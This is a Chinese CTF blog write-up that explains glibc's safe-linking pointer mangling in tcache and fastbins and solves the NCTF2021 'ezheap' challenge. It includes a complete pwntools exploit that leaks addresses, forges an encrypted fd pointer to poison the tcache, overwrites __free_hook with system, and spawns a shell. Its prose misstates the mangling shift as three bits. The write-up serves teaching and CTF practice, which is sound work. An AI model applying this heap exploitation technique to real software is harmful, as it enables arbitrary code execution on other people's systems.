Pwn-glibc高版本堆题攻击之safe unlink
推荐 原创测试版本2.33_5
从2.32版本开始,tcache和fastbin里面就加入了一个safe unlink的机制,主要是对fd指针的一个异或操作来使得不那么好利用UAF等需要fd指针的手法进行地址泄露以及进一步的任意地址写
具体的效果如下:
发现fd指针的值为0x562e784a3,如果是低版本的话,应该是0x562e784a3000也就是上一个堆块的地址。可以看出fd指针被加密了
那么是怎么加密的呢,我们看看源码:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
/
*
Safe
-
Linking:
Use randomness
from
ASLR (mmap_base) to protect single
-
linked lists
of Fast
-
Bins
and
TCache. That
is
, mask the
"next"
pointers of the
lists' chunks,
and
also perform allocation alignment checks on them.
This mechanism reduces the risk of pointer hijacking, as was done with
Safe
-
Unlinking
in
the double
-
linked lists of Small
-
Bins.
It assumes a minimum page size of
4096
bytes (
12
bits). Systems with
larger pages provide less entropy, although the pointer mangling
still works.
*
/
/
*
加密函数
*
/
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >>
12
) ^ ((size_t) ptr)))
/
*
解密函数
*
/
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
|
pos是我们当前的堆块的fd指针的地址,ptr是未加密的时候fd指针应该指向的堆地址(也就是前一个被放进tcache的堆块的fd指针的位置)
说通俗一点,当堆块P被free的时候,P的fd要放前一个堆块的ptr(tcache里面放的就直接是fd指针的位置了)。而放置的时候,会把&P->fd这个堆地址右移三位,当作一个密钥,来异或ptr这个明文,最后在把得到的密文放在P->这个位置
我们再多放进tcache一个堆块测试一下:
没问题。那么解密过程又是怎么的呢?我们这里演草一下,就很清晰明了了:
结论就是,密文异或密钥就得到明文了(这里感谢二进制密码爷师傅的指点)
模板题:【NCTF2021】ezheap
版本
同测试版本
保护
ida
很常见的菜单题,实现了增删改查,然后删的时候有个UAF:
不过并没有完全UAF,没有清空指针,但是因为清空了size数组上对应的值,不能再edit了。但是我们可以通过在note段放两个相同的堆指针(因为没有清空,add free add就好了),free那个被清空size的idx,然后就能通过另一个idx对bin中的堆块进行修改了,就可以通过edit将它的fd指针设置为(__free_hook ^ (pos>>3))实现tcache poison然后get shell
exp
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
|
from
pwn
import
*
from
hashlib
import
sha256
import
base64
context.log_level
=
'debug'
#context.arch = 'amd64'
context.arch
=
'amd64'
context.os
=
'linux'
def
z():
gdb.attach(r)
def
cho(num):
r.sendafter(
">> "
,
str
(num))
def
add(size,con):
cho(
1
)
r.sendafter(
"Size: "
,
str
(size))
r.sendafter(
"Content: "
,con)
def
edit(idx,con):
cho(
2
)
r.sendafter(
"Index: "
,
str
(idx))
r.sendafter(
"Content: "
,con)
def
delet(idx):
cho(
3
)
r.sendafter(
"Index: "
,
str
(idx))
def
show(idx):
cho(
4
)
r.sendafter(
"Index: "
,
str
(idx))
def
exp():
global
r
global
libc
libc
=
ELF(
'./libc-2.33.so'
)
r
=
process(
'./ezheap'
)
##[+]:leak libc && heap
for
i
in
range
(
0
,
8
):
add(
0x80
,
'nameless'
)
for
i
in
range
(
1
,
8
):
delet(i)
##z()
delet(
0
)
show(
1
)
heap
=
u64(r.recv(
5
).ljust(
8
,
'\x00'
))
key
=
heap
heap<<
=
12
log.success(
'heap:'
+
hex
(heap))
show(
0
)
libcbase
=
u64(r.recvuntil(
'\x7f'
)[
-
6
:].ljust(
8
,
'\x00'
))
-
0x1e0c00
log.success(
'libcbase:'
+
hex
(libcbase))
##[+]:set libc_func
one
=
[
0xe3b2e
,
0xe3b31
,
0xe3b34
]
free_hook
=
libcbase
+
libc.sym[
'__free_hook'
]
system
=
libcbase
+
libc.sym[
'system'
]
##onegadget=libcbase+one[0]
##UAF && poison to get shell
cry_free_hook
=
(free_hook)^key
add(
0x80
,
'nameless'
)
delet(
7
)
edit(
8
,p64(cry_free_hook)
+
'\n'
)
add(
0x80
,
'/bin/sh\x00'
)
##9
add(
0x80
,p64(system))
delet(
9
)
r.interactive()
if
__name__
=
=
'__main__'
:
exp()
|
参考博客
更多【glibc高版本堆题攻击之safe unlink】相关视频教程:www.yxfzedu.com
相关文章推荐
- 数码相机-立体相机标定 - 其他
- java-java计算 - 其他
- python-前端面试题 - 其他
- git-IntelliJ IDEA 2023.2.1 (Ultimate Edition) 版本 Git 如何合并多次的本地提交进行 Push - 其他
- 音视频-中文编程软件视频推荐,自学编程电脑推荐,中文编程开发语言工具下载 - 其他
- node.js-npm install:sill idealTree buildDeps - 其他
- 编辑器-vscode 访问本地或者远程docker环境 - 其他
- git-IntelliJ IDEA 2023.2.1 (Ultimate Edition) 版本 Git 如何找回被 Drop Commit 的提交记录 - 其他
- 算法-力扣第1035题 不相交的线中等 c++ (最长公共子序列) 动态规划 附Java代码 - 其他
- java-JavaWeb课程复习资料——idea创建JDBC - 其他
- python-Python---列表的循环遍历,嵌套 - 其他
- python-Python的版本如何查询? - 其他
- java-IDEA 函数下边出现红色的波浪线,提示报错 - 其他
- 算法-算法通关村第八关|白银|二叉树的深度和高度问题【持续更新】 - 其他
- 算法-C现代方法(第19章)笔记——程序设计 - 其他
- git-IntelliJ Idea 撤回git已经push的操作 - 其他
- c#-html导出word - 其他
- excel-使用 AIGC ,ChatGPT 快速合并Excel工作薄 - 其他
- 开发语言-怎么学编程效率高,编程练习网站编程软件下载,中文编程开发语言工具下载 - 其他
- 编程技术-鲁大师电动车智能化测评报告第二十三期:实测续航95km,九号Q90兼顾个性与实用 - 其他
记录自己的技术轨迹
文章规则:
1):文章标题请尽量与文章内容相符
2):严禁色情、血腥、暴力
3):严禁发布任何形式的广告贴
4):严禁发表关于中国的政治类话题
5):严格遵守中国互联网法律法规
6):有侵权,疑问可发邮件至service@yxfzedu.com
近期原创 更多
